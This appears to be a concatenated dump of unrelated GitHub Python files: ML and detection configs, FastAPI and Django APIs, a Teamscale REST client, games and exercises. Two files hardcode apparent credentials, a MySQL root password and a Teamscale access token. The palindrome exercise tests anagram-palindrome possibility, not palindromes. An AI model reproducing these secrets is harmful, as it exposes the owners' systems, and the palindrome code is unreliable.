torch.nn as nn\n\n\n'''\nThis is a basic implementation of the tanh fixed point solver.\nWe want to compute z* the solution to z = tanh(Wz* + x).\n'''\n\nimport torch\nimport torch.nn as nn\n\n\nclass TanhFixedPointLayer(nn.Module):\n def __init__(self, out_features, tol=1e-4, max_iter=50):\n super().__init__()\n self.linear = nn.Linear(out_features, out_features, bias=False)\n self.tol = tol\n self.max_iter = max_iter\n\n def forward(self, x):\n # initialize output z to be zero\n z = torch.zeros_like(x)\n self.iterations = 0\n\n # iterate until convergence\n while self.iterations < self.max_iter:\n z_next = torch.tanh(self.linear(z) + x)\n self.err = torch.norm(z - z_next)\n z = z_next\n self.iterations += 1\n if self.err < self.tol:\n break\n\n return z\n\n\nclass TanhNewtonLayer(nn.Module):\n def __init__(self, out_features, tol=1e-4, max_iter=50):\n super().__init__()\n self.linear = nn.Linear(out_features, out_features, bias=False)\n self.tol = tol\n self.max_iter = max_iter\n\n def forward(self, x):\n # initialize output z to be zero\n z = torch.tanh(x)\n self.iterations = 0\n\n # iterate until convergence\n while self.iterations < self.max_iter:\n z_linear = self.linear(z) + x\n g = z - torch.tanh(z_linear)\n self.err = torch.norm(g)\n if self.err < self.tol:\n break\n\n # newton step\n J = torch.eye(z.shape[1])[None, :, :] - (1 / torch.cosh(z_linear) ** 2)[:, :, None] * self.linear.weight[None, :, :]\n z = z - torch.solve(g[:, :, None], J)[0][:, :, 0]\n self.iterations += 1\n\n g = z - torch.tanh(self.linear(z) + x)\n z[torch.norm(g, dim=1) > self.tol, :] = 0\n return z\n\n\nif __name__ == \"__main__\":\n\n samps, nout = 10, 10\n x = torch.randn(samps, nout)\n tanhFP = TanhFixedPointLayer(nout)\n z = tanhFP(x)\n print(f\"FI Terminated after {tanhFP.iterations} iterations with error {tanhFP.err}\")\n print(f\"z* = {z}\")\n\n tanhFPNWT = TanhNewtonLayer(nout)\n z = tanhFPNWT(x)\n print(f\"NWT Terminated after {tanhFPNWT.iterations} iterations with error {tanhFPNWT.err}\")\n print(f\"z* = {z}\")\n","repo_name":"Daniellayeghi/DEQ_Examples","sub_path":"chapter_1.py","file_name":"chapter_1.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"43746709883","text":"QUESTION = [\n \"유경자 씨의 남편의 이름은?\",\n \"이경수 씨의 딸의 이름은?\",\n \"민주희 씨는 이경수 씨와 어떤 관계입니까?\"]\n\nR_ANS = [\"정현철\", \"이현지\", \"조카\"]\n\nfor i in range(3):\n print(QUESTION[i])\n ans = input()\n if ans == R_ANS[i]:\n print(\"정답입니다\")\n else:\n print(\"틀렸습니다\")\n\n'''\n유경자 씨의 남편의 이름은?\n정현철\n정답입니다\n이경수 씨의 딸의 이름은?\n이현지\n정답입니다\n민주희 씨는 이경수 씨와 어떤 관계입니까?\n조카\n정답입니다\n\n유경자 씨의 남편의 이름은?\n정\n틀렸습니다\n이경수 씨의 딸의 이름은?\n이\n틀렸습니다\n민주희 씨는 이경수 씨와 어떤 관계입니까?\n가족\n틀렸습니다\n'''","repo_name":"tjwodud04/Books-and-other-stuffs","sub_path":"책, 튜토리얼(Following books, tutorials)/Books/파이썬으로 배우는 게임 개발 입문편/Chapter5/list0502_3.py","file_name":"list0502_3.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71663276304","text":"import datetime\nfrom fastapi import FastAPI\nimport mysql.connector\n\nfrom src.dao.exercise_dao import ExerciseDao\nfrom src.dao.horse_dao import HorseDao\nfrom src.dao.plan_dao import PlanDao\nfrom src.dao.treatment_dao import TreatmentDao\nfrom src.model.calendar_item_request import CalendarItemRequest\nfrom src.model.calendar_item_update import CalendarItemUpdate\nfrom src.model.horse_request import HorseRequest\n\napp = FastAPI()\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"Firisacce324b21:\",\n database=\"eep\"\n)\n\ntreatment_dao = TreatmentDao(db)\nexercise_dao = ExerciseDao(db)\nhorse_dao = HorseDao(db)\nplan_dao = PlanDao(db)\n\n@app.get(\"/health\")\nasync def health():\n return {}\n\n\n@app.get(\"/horses\")\nasync def get_horses():\n return horse_dao.fetch_all()\n\n\n@app.post(\"/horse\")\nasync def add_horse(horse: HorseRequest):\n return horse_dao.create_horse(horse.name)\n\n\n@app.delete(\"/horse/{id}\")\nasync def delete_horse(id):\n return horse_dao.delete_horse(id)\n\n\n@app.put(\"/horse/{id}\")\nasync def update_horse(id, horse: HorseRequest):\n return horse_dao.update_horse(id, horse.name)\n\n\n@app.get(\"/calendar\")\nasync def get_calendar(date: datetime.date):\n return plan_dao.fetch_all(date)\n\n\n@app.post(\"/calendar/item\")\nasync def add_to_calendar(item: CalendarItemRequest):\n if item.exercise_id is None and item.treatment_id is None:\n raise ValueError(\"You must provide either exercise_id or treatment_id (or both) to create a plan\")\n\n return plan_dao.create_plan(item.exercise_id, item.treatment_id, item.horse_id, item.date)\n\n\n@app.delete(\"/calendar/item/{id}\")\nasync def delete_activity(id):\n return plan_dao.delete_plan(id)\n\n\n@app.put(\"/calendar/item/{id}\")\nasync def update_activity(id, item: CalendarItemUpdate):\n if item.exercise_id is None and item.treatment_id is None:\n raise ValueError(\"You must provide either exercise_id or treatment_id (or both) to update a plan\")\n\n return plan_dao.update_plan(id, item.exercise_id, item.treatment_id)\n\n@app.get(\"/exercises\")\nasync def get_exercises():\n return exercise_dao.fetch_all()\n\n@app.get(\"/treatments\")\nasync def get_treatments():\n return treatment_dao.fetch_all()\n\n@app.on_event(\"shutdown\")\ndef shutdown_event():\n db.close()","repo_name":"Alejandro-Mirez/EquestrianPlannerApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24323602475","text":"# model settings\nmodel = dict(\n type='HybridDetector',\n backbone=None,\n neck=None,\n # bbox_head 执行用来 回归得到框 和 框中物体分类\n bbox_head=dict(\n type='SharedFCBBoxHead', # 全连接层类型\n num_fcs=2, # 全连接层数量\n in_channels=256 * 2, # 输��通道数 对应上边bbox_roi_extractor设置的out_channels 混合两个模型的\n fc_out_channels=1024, # 输出通道数\n roi_feat_size=7, # ROI特征层尺寸 对应上边bbox_roi_extractor设置的roi_layer['out_size']\n num_classes=1 + 1, # 分类数 背景类 + 物体类\n target_means=[0., 0., 0., 0.], # 均值\n target_stds=[0.1, 0.1, 0.2, 0.2], # 方差\n reg_class_agnostic=False,\n # 是否采用class_agnostic的方式来预测,class_agnostic表示输出bbox时只考虑其是否为前景,后续分类的时候再根据该bbox在网络中的类别得分来分类,也就是说一个框可以对应多个类别\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n)\n# model training and testing settings\ntrain_cfg = dict(\n rcnn=dict(\n assigner=dict(\n type='MaxIoUAssigner',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n)\n\ntest_cfg = dict(\n rcnn=dict(\n score_thr=0.05, nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05), max_per_img=100))\n\n# dataset settings\ndataset_type = 'CocoDataset'\ndata_root = 'data/coco/'\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\n\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(type='Resize', img_scale=(1333, 800), keep_ratio=True), # 多尺度训练\n dict(type='Pad', size_divisor=32),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='DefaultFormatBundle'),\n dict(\n type='Collect',\n keys=['img', 'gt_bboxes', 'gt_labels'],\n )\n]\n\n\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(1333, 800),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', keys=['img']),\n ])\n]\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'annotations/instances_train2017.json',\n img_prefix=data_root + 'train2017/',\n pipeline=train_pipeline),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'annotations/instances_val2017.json',\n img_prefix=data_root + 'val2017/',\n pipeline=test_pipeline),\n test=dict(\n type=dataset_type,\n ann_file=data_root + 'annotations/instances_val2017.json',\n img_prefix=data_root + 'val2017/',\n pipeline=test_pipeline))\nevaluation = dict(interval=1, metric='bbox')\n# optimizer\n# 学习率调整 lr=0.02为8个GPU的\noptimizer = dict(type='SGD', lr=0.02/8, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=1)\n# yapf:disable\nlog_config = dict(\n interval=20, # 使用多少张图片就输出一次 100/808\n hooks=[\n dict(type='TextLoggerHook'),\n # dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 30\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = '/content/drive/My Drive/work_dirs/Hybrid_Head'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\n","repo_name":"JKingKong/mmdetection","sub_path":"configs/Hybrid_Head.py","file_name":"Hybrid_Head.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15323271506","text":"import requests\nfrom requests.auth import HTTPBasicAuth\nimport json\nfrom model.project import Project\n\n# TODO: Modify these according to your setup\n# The Base URL of the Teamscale client\nTEAMSCALE_BASE_URL = \"http://192.168.2.104:8080/\"\n# The API Suffix which is appended to the client BASE URL\nTEAMSCALE_API_URL = \"api/v8.0.3/\"\n# The full base URL\nTEAMSCALE_REST_URL = TEAMSCALE_BASE_URL + TEAMSCALE_API_URL\n\n# The Teamscale username\nTEAMSCALE_USERNAME = \"admin\"\n# The access token for the Teamscale user\nTEAMSCALE_ACCESS_TOKEN = \"4kb52KjSBFZ87QnzUQvXYVDKIZfJE8Oe\"\n# The concrete authentication payload for REST requests\nTEAMSCALE_AUTHENTICATION = HTTPBasicAuth(TEAMSCALE_USERNAME, TEAMSCALE_ACCESS_TOKEN)\n\n# Contains a mapping programming language --> included/ excluded file patterns\nTEAMSCALE_LANGUAGE_SETTINGS = {\n \"C/C++\":\n (\"**.cpp, **.cc, **.c, **.h, **.hh, **.hpp, **.cxx, **.hxx, **.inl, **.inc, **.architecture\",\n \"\"),\n \"C\":\n (\"**.cpp, **.cc, **.c, **.h, **.hh, **.hpp, **.cxx, **.hxx, **.inl, **.inc, **.architecture\",\n \"\"),\n \"Rust\":\n (\"**.rs\",\n \"\"),\n \"Java\":\n (\"**.java, **.architecture\",\n \"**/package-info.java, **/module-info.java\"),\n \"Kotlin\":\n (\"**.kt, **.kts, **.ktm, **.architecture\",\n \"\"),\n \"Python\":\n (\"**.py, **.architecture\",\n \"\"),\n \"Go\":\n (\"**.go\",\n \"\")\n}\n\n\ndef get_project(project_id: str = None):\n \"\"\"\n Gets all projects or if a project_id is specified just a single project\n\n Args:\n project_id: a project id, default None\n\n Returns:\n list of projects as dictionaries or a single project as dictionary depending on argument\n\n \"\"\"\n if project_id is None:\n response = requests.get(TEAMSCALE_REST_URL + f\"projects\", auth=TEAMSCALE_AUTHENTICATION)\n return json.loads(response.text)\n else:\n response = requests.get(TEAMSCALE_REST_URL + f\"projects/{project_id}\",\n auth=TEAMSCALE_AUTHENTICATION)\n return json.loads(response.text)\n\n\ndef get_project_configuration(project_id: str):\n \"\"\"\n Gets the full project configuration for a certain project given a project_id.\n\n Args:\n project_id: a project id\n\n Returns:\n the project's configuration as dictionary\n\n \"\"\"\n response = requests.get(TEAMSCALE_REST_URL + f\"projects/{project_id}/configuration\",\n auth=TEAMSCALE_AUTHENTICATION)\n return json.loads(response.text)\n\n\ndef post_project_git(project: Project):\n \"\"\"\n Creates a new project in Teamscale with the given id, git-repo path and default_branch name. The git-account is\n hardcoded to \"schuhmaj\" and should have been previously created in Teamscale!\n\n Args:\n project: the project which should be created\n\n Returns:\n True if the project was successfully created\n\n \"\"\"\n included_files, excluded_files = TEAMSCALE_LANGUAGE_SETTINGS[project.language]\n # Fix for (pure) C not having its own default analysis mode (Workaround which gets the job done)\n profile = project.language if project.language != \"C\" else \"C/C++\"\n response = requests.post(TEAMSCALE_REST_URL + f\"projects\",\n auth=TEAMSCALE_AUTHENTICATION,\n json={\n \"name\": project.project_id,\n \"publicIds\": [\n project.project_id\n ],\n \"profile\": f\"{profile} (default)\",\n \"connectors\": [\n {\n \"type\": \"Git\",\n \"connectorIdentifierOptionName\": \"Repository identifier\",\n \"options\": {\n \"Account\": \"schuhmaj\",\n \"Path suffix\": project.repo_full_name,\n \"Repository identifier\": f\"{project.project_id}-repo\",\n \"Included file names\": included_files,\n \"Excluded file names\": excluded_files,\n \"Include Submodules\": \"false\",\n \"Submodule recursion depth\": \"10\",\n \"Default branch name\": project.branch,\n \"Enable branch analysis\": \"false\",\n \"Start revision\": project.revision,\n \"End revision\": project.revision\n }\n }\n ]\n })\n return response.status_code == 201\n\n\ndef delete_project(project_id: str):\n \"\"\"\n Deletes a project from teamscale\n Args:\n project_id: the project's id\n\n Returns:\n True if the deletion was successfully\n\n \"\"\"\n response = requests.delete(TEAMSCALE_REST_URL + f\"projects/{project_id}\",\n auth=TEAMSCALE_AUTHENTICATION)\n return response.status_code == 204\n\n\ndef get_findings(project_id: str, path: str = '', filter_findings: [str] = None, invert: bool = True,\n truncate: bool = True):\n \"\"\"\n Get the findings of a specific project given a project id.\n\n Args:\n project_id: The project id\n path: The general path were the findings shall be located inside the project\n filter_findings: Applies a filter and removes the elements listed in the filter (Notice the invert param!)\n invert: Inverts the filter, default true\n truncate: no truncation to the result\n\n Returns:\n List of findings as dictionaries\n\n Examples:\n If one only wants the code clones, then use the function in the following way:\n\n get_findings(\"project_name\", filter_findings=\"Redundancy\")\n\n \"\"\"\n if filter_findings is None:\n filter_findings = []\n response = requests.get(TEAMSCALE_REST_URL + f\"projects/{project_id}/findings/list\",\n auth=TEAMSCALE_AUTHENTICATION,\n params={\n \"uniform-path\": f\"{path}\",\n \"filter\": f\"{filter_findings}\",\n \"invert\": f\"{invert}\",\n \"all\": f\"{truncate}\"\n })\n if response.status_code == 200:\n return json.loads(response.text)\n else:\n return None\n\n\ndef get_metrics(project_id: str, path: str = ''):\n \"\"\"\n Gets metrics of a specific project with a given project_id an optional sub folder.\n\n Args:\n project_id: the project id\n path: the optional path for which to collect the metrics inside the project structure\n\n Returns:\n list of metrics as dictionaries or None if none where available\n\n \"\"\"\n response = requests.get(TEAMSCALE_REST_URL + f\"projects/{project_id}/metric-assessments\",\n auth=TEAMSCALE_AUTHENTICATION,\n params={\n \"uniform-path\": f\"{path}\"\n })\n if response.status_code == 200:\n json_data = json.loads(response.text)\n if len(json_data) >= 1:\n return json_data[0][\"metrics\"]\n else:\n return None\n else:\n return None\n","repo_name":"schuhmaj/quantitative-code-clone-analysis","sub_path":"src/teamscale/api_interface.py","file_name":"api_interface.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6020538577","text":"import turtle\n\n#Criar parte em que um jogador vence!\n\n# Tela\nwm = turtle.Screen()\nwm.title('Pong by @Allef.K')\nwm.bgcolor('black')\nwm.setup(width=800, height=600)\nwm.tracer(0)\n\n# Placar\nplacar_a = 0\nplacar_b = 0\ncont = 3\n\n# Jogador A\njogador_a = turtle.Turtle()\njogador_a.speed(0)\njogador_a.shape('square')\njogador_a.color('white')\njogador_a.shapesize(stretch_wid=5, stretch_len=1)\njogador_a.penup()\njogador_a.goto(-350, 0)\n\n# Jogador B\njogador_b = turtle.Turtle()\njogador_b.speed(0)\njogador_b.shape('square')\njogador_b.color('white')\njogador_b.shapesize(stretch_wid=5, stretch_len=1)\njogador_b.penup()\njogador_b.goto(350, 0)\n\n# Bola\nbola = turtle.Turtle()\nbola.speed(0)\nbola.shape('square')\nbola.color('white')\nbola.goto(0, 0)\nbola.penup()\nbola.dx = 0.4\nbola.dy = -0.4\n\n# Bola2\nbola2 = turtle.Turtle()\nbola2.speed(0)\nbola2.shape('blank')\nbola2.color('')\nbola2.goto(200, 0)\nbola2.penup()\nbola2.dx = 0.4\nbola2.dy = -0.4\n\n\ncaneta = turtle.Turtle()\ncaneta.speed(0)\ncaneta.color(\"white\")\ncaneta.penup()\ncaneta.hideturtle()\ncaneta.goto(0, 230)\ncaneta.write(\"Jogador A: 0\\nJogador B: 0\", align=\"center\",font=(\"courier\", 20, \"normal\"))\n\n# Funções\ndef jogador_a_up():\n y = jogador_a.ycor()\n y += 20\n jogador_a.sety(y)\n\ndef jogador_a_down():\n y = jogador_a.ycor()\n y -= 20\n jogador_a.sety(y)\n\ndef jogador_b_up():\n y = jogador_b.ycor()\n y += 20\n jogador_b.sety(y)\n\ndef jogador_b_down():\n y = jogador_b.ycor()\n y -= 20\n jogador_b.sety(y)\n\n# Teclas\nwm.listen()\nwm.onkeypress(jogador_a_up, \"space\")\nwm.onkeypress(jogador_a_down, \"s\")\nwm.onkeypress(jogador_b_up, \"Up\")\nwm.onkeypress(jogador_b_down, \"Down\")\n\n\n\nwhile True:\n wm.update()\n\n if placar_a >= 15 or placar_b >= 15:\n # Movimento da bola2\n bola2.setx(bola2.xcor() + bola2.dx)\n bola2.sety(bola2.ycor() + bola2.dy)\n bola2.color('white')\n bola2.shape('square')\n\n # Movimento da bola\n bola.setx(bola.xcor() + bola.dx)\n bola.sety(bola.ycor() + bola.dy)\n\n\n # Limites da tela\n if bola.ycor() > 290:\n bola.sety(290)\n bola.dy *= -1\n\n if bola.ycor() < -290:\n bola.sety(-290)\n bola.dy *= -1\n\n if bola.xcor() > 390:\n bola.goto(0,0)\n bola.dx *= -1\n placar_a += 1\n caneta.clear()\n caneta.write(f\"Jogador A: {placar_a}\\nJogador B: {placar_b}\", align=\"center\", font=(\"courier\", 20, \"normal\"))\n\n if bola.xcor() < -390:\n bola.goto(0,0)\n bola.dx *= -1\n placar_b += 1\n caneta.clear()\n caneta.write(f\"Jogador A: {placar_a}\\nJogador B: {placar_b}\", align=\"center\", font=(\"courier\", 20, \"normal\"))\n\n #Bola2\n if bola2.ycor() > 290:\n bola2.sety(290)\n bola2.dy *= -1\n\n if bola2.ycor() < -290:\n bola2.sety(-290)\n bola2.dy *= -1\n\n if bola2.xcor() > 390:\n bola2.goto(0,0)\n bola2.dx *= -1\n placar_a += 1\n caneta.clear()\n caneta.write(f\"Jogador A: {placar_a}\\nJogador B: {placar_b}\", align=\"center\", font=(\"courier\", 20, \"normal\"))\n\n if bola2.xcor() < -390:\n bola2.goto(0,0)\n bola2.dx *= -1\n placar_b += 1\n caneta.clear()\n caneta.write(f\"Jogador A: {placar_a}\\nJogador B: {placar_b}\", align=\"center\", font=(\"courier\", 20, \"normal\"))\n\n\n # Colisão da bola com o jogador\n if (bola.xcor() > 340 and bola.xcor() < 350) and (\n bola.ycor() < jogador_b.ycor() + 40 and bola.ycor() > jogador_b.ycor() - 40):\n bola.setx(340)\n bola.dx *= -1\n\n if (bola.xcor() < -340 and bola.xcor() > -350) and (\n bola.ycor() < jogador_a.ycor() + 40 and bola.ycor() > jogador_a.ycor() - 40):\n bola.setx(-340)\n bola.dx *= -1\n\n #Bola2\n if (bola2.xcor() > 340 and bola2.xcor() < 350) and (\n bola2.ycor() < jogador_b.ycor() + 40 and bola2.ycor() > jogador_b.ycor() - 40):\n bola2.setx(340)\n bola2.dx *= -1\n\n if (bola2.xcor() < -340 and bola2.xcor() > -350) and (\n bola2.ycor() < jogador_a.ycor() + 40 and bola2.ycor() > jogador_a.ycor() - 40):\n bola2.setx(-340)\n bola2.dx *= -1\n\n","repo_name":"19AllefKeynner/exercicios-python","sub_path":"001PONG.py","file_name":"001PONG.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"7098905712","text":"# -*- coding:utf-8 -*-\nimport json\nimport multiprocessing\nimport os\n\n\n# worker 数取值方式\n# web_concurrency_str > 启用max_worker --> max(workers_per_core_str*cores, 2)\n# > 没启用max_worker --> min(max(workers_per_core_str*cores, 2), use_max_workers)\n# 对应环境变量\n# web_concurrency_str WEB_CONCURRENCY\n# use_max_workers MAX_WORKERS\n# workers_per_core_str WORKERS_PER_CORE\n\n# 每个核的worker数,用于下边计算\nworkers_per_core_str = os.getenv(\"WORKERS_PER_CORE\", \"1\")\n# 最大worker数\nmax_workers_str = os.getenv(\"MAX_WORKERS\")\nuse_max_workers = None\nif max_workers_str:\n use_max_workers = int(max_workers_str)\n# web当前的worker数\nweb_concurrency_str = os.getenv(\"WEB_CONCURRENCY\", None)\n# 根据核数计算默认worker数\ncores = multiprocessing.cpu_count()\nworkers_per_core = float(workers_per_core_str)\ndefault_web_concurrency = workers_per_core * cores\nif web_concurrency_str:\n web_concurrency = int(web_concurrency_str)\n assert web_concurrency > 0\nelse:\n # 默认核数,最小为2\n web_concurrency = max(int(default_web_concurrency), 2)\n # 若启用最大worker数,则为当前worker 和 max workers 最小值\n if use_max_workers:\n web_concurrency = min(web_concurrency, use_max_workers)\n\n# 地址和端口的绑定\nhost = os.getenv(\"HOST\", \"0.0.0.0\")\nport = os.getenv(\"PORT\", \"80\")\nbind_env = os.getenv(\"BIND\", None)\nif bind_env:\n use_bind = bind_env\nelse:\n use_bind = \"{}:{}\".format(host, port) # f\"{host}:{port}\"\n\n# 日志级别\nuse_loglevel = os.getenv(\"LOG_LEVEL\", \"info\")\n\naccesslog_var = os.getenv(\"ACCESS_LOG\", \"-\")\nuse_accesslog = accesslog_var or None\nerrorlog_var = os.getenv(\"ERROR_LOG\", \"-\")\nuse_errorlog = errorlog_var or None\ngraceful_timeout_str = os.getenv(\"GRACEFUL_TIMEOUT\", \"120\")\ntimeout_str = os.getenv(\"TIMEOUT\", \"120\")\nkeepalive_str = os.getenv(\"KEEP_ALIVE\", \"5\")\n\n# Gunicorn config variables\nworkers = web_concurrency\nbind = use_bind\nloglevel = use_loglevel\nworker_tmp_dir = \"\"\nerrorlog = use_errorlog\naccesslog = use_accesslog\n# 接收到restart信号后,worker可以在graceful_timeout时间内,继续处理完当前requests。\ngraceful_timeout = int(graceful_timeout_str)\n# 链接超时\ntimeout = int(timeout_str)\n# 链接保持,默认2s, 可减少链接频繁断开造成取用超时问题\nkeepalive = int(keepalive_str)\n\n\n# For debugging and testing\nlog_data = {\n \"loglevel\": loglevel,\n \"workers\": workers,\n \"bind\": bind,\n \"graceful_timeout\": graceful_timeout,\n \"timeout\": timeout,\n \"keepalive\": keepalive,\n \"errorlog\": errorlog,\n \"accesslog\": accesslog,\n # Additional, non-gunicorn variables\n \"workers_per_core\": workers_per_core,\n \"use_max_workers\": use_max_workers,\n \"host\": host,\n \"port\": port,\n}\nprint(json.dumps(log_data))\n","repo_name":"pylixm/docker-fastapi-demo","sub_path":"gunicorn_conf.py","file_name":"gunicorn_conf.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"47"} +{"seq_id":"24859784187","text":"from django.utils.translation import gettext as _\nfrom rest_framework import mixins\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import APIException\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom core.api.v1.control.serializers import (\n RouterSerializer,\n MapSerializer,\n SearchSerializer,\n)\nfrom core.common.models import Router, Map\nfrom core.dijkstra import Graph\nfrom ..metadata import Metadata\n\n\nclass MapViewSet(mixins.CreateModelMixin, GenericViewSet):\n queryset = Map.objects\n serializer_class = MapSerializer\n permission_classes = [IsAuthenticated]\n metadata_class = Metadata\n\n\nclass RouterViewSet(GenericViewSet):\n \"\"\"\n Search the shortest route according to the fuel price.\n \"\"\"\n\n queryset = Router.objects\n serializer_class = RouterSerializer\n permission_classes = [IsAuthenticated]\n metadata_class = Metadata\n\n @action(\n detail=True,\n methods=[\"POST\"],\n url_name=\"router-search\",\n serializer_class=SearchSerializer,\n permission_classes=[],\n )\n def search(self, request, **kwargs):\n serializer = SearchSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n map_name = request.data.get(\"map_name\")\n source = request.data.get(\"source\")\n destiny = request.data.get(\"destiny\")\n autonomy = request.data.get(\"autonomy\")\n liter_value = request.data.get(\"liter_value\")\n\n routers = Router.objects.filter(map__map_name=map_name)\n\n result = {}\n\n if routers:\n try:\n grafo = Graph()\n nodes = []\n for r in routers:\n if r.source not in nodes:\n nodes.append(r.source)\n if r.destiny not in nodes:\n nodes.append(r.destiny)\n\n grafo.add_edge(r.source, r.destiny, r.distance)\n\n grafo.add_node(nodes)\n\n km, path = grafo.caminho(source, destiny)\n\n result = {\"path\": path, \"cost\": ((liter_value / autonomy) * km)}\n except KeyError:\n raise APIException(detail=_(\"Router to destiny not exist\"))\n\n return Response(result)\n","repo_name":"dyohan9/logistics-api","sub_path":"core/api/v1/control/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37268560424","text":"# Week 8 Programming Assignment 1\n\n# Given a string as input, determine if it is a palindrome or not. (Ignore the spaces, case and any punctuation or special characters present in the string). \n\n# Note: A palindromes is a string which has characters in the same order when read forward or backwards.\nNO_OF_CHARS = 256\ndef canFormPalindrome(str1):\n # Get lengths of both strings\n \n \n count = [0] * (NO_OF_CHARS)\n \n # For each character in input strings,\n # increment count in the corresponding\n # count array\n for i in range(0, len(str1)):\n count[ord(str1[i])] = count[ord(str1[i])] + 1\n \n # Count odd occurring characters\n odd = 0\n \n for i in range(0, NO_OF_CHARS):\n if (count[i] & 1):\n odd = odd + 1\n \n if (odd > 1):\n return False\n \n # Return true if odd count is 0 or 1,\n return True\n \n# Driver code\nst1 = input()\n\nstr1=''.join(filter(str.isalnum, st1.casefold()))\n\n# Function Call\nif canFormPalindrome(str1):\n print(\"Yes\",end=\"\")\nelse:\n print(\"No\",end=\"\")","repo_name":"SarikaRathi/NPTEL-Joy-of-Computing-Week-8-Solution","sub_path":"week_8_programming_ass1.py","file_name":"week_8_programming_ass1.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2434714854","text":"import platform\nimport sys\n\n\nfrom ._version import __version__ as kqlmagic_version\nfrom .dependencies import Dependencies\n\n\n\ndef _python_info() -> dict:\n \"\"\"Return a dict with the Python implementation and version.\n\n Provide both the name and the version of the Python implementation\n currently running. For example, on CPython 2.7.5 it will return\n {'name': 'CPython', 'version': '2.7.5'}.\n \"\"\"\n\n implementation = 'Unknown'\n implementation_version = 'Unknown'\n try:\n implementation = platform.python_implementation()\n\n if implementation == 'CPython':\n implementation_version = platform.python_version()\n\n elif implementation == 'PyPy':\n if hasattr(sys, \"pypy_version_info\"):\n pypy_version_info = getattr(sys, \"pypy_version_info\")\n implementation_version = f'{pypy_version_info.major}.{pypy_version_info.minor}.{pypy_version_info.micro}'\n \n if pypy_version_info.releaselevel != 'final':\n implementation_version = ''.join([\n implementation_version, pypy_version_info.releaselevel\n ])\n\n else:\n implementation_version = 'Unknown'\n\n except:\n pass\n\n try:\n implementation_branch = platform.python_branch()\n except:\n implementation_branch = 'Unknown'\n\n return {'name': implementation, 'version': implementation_version, 'branch': implementation_branch}\n\n\ndef _platform_info() -> dict:\n \"\"\"Return a dict with the system version and release.\"\"\"\n\n try:\n platform_system = platform.system()\n except:\n platform_system = 'Unknown'\n\n try:\n platform_release = platform.release()\n except:\n platform_release = 'Unknown'\n\n return {'system': platform_system, 'release': platform_release}\n\n\ndef _packages_info() -> dict:\n \"\"\"Return a dict with installed packages version\"\"\"\n\n return Dependencies.installed_packages()\n\n\ndef bug_info(default_options, default_env, connections_info, last_execution:dict):\n \"\"\"Generate information for a bug report.\"\"\"\n\n python_info = _python_info()\n platform_info = _platform_info()\n packages_info = _packages_info()\n default_options_info = default_options\n last_execution = last_execution\n\n # TODO: collect information about: \n # jupyter information (front end, versions)\n # ipython environment (version, temp file locations)\n # all modules versions\n # cell content, \n # environment variables, (that starts with KQLMAGIC and others)\n # default options, \n # result object (if doesn't exist), \n # last error (including stack), \n\n return {\n 'kqlmagic': {'version': kqlmagic_version},\n 'platform': platform_info,\n 'packages': packages_info,\n 'python': python_info,\n 'kqlmagic_default_options': default_options_info,\n 'kqlmagic_connections:': connections_info,\n 'kqlmagic_default_env': default_env,\n 'Kqlmagic_last_execution': last_execution,\n 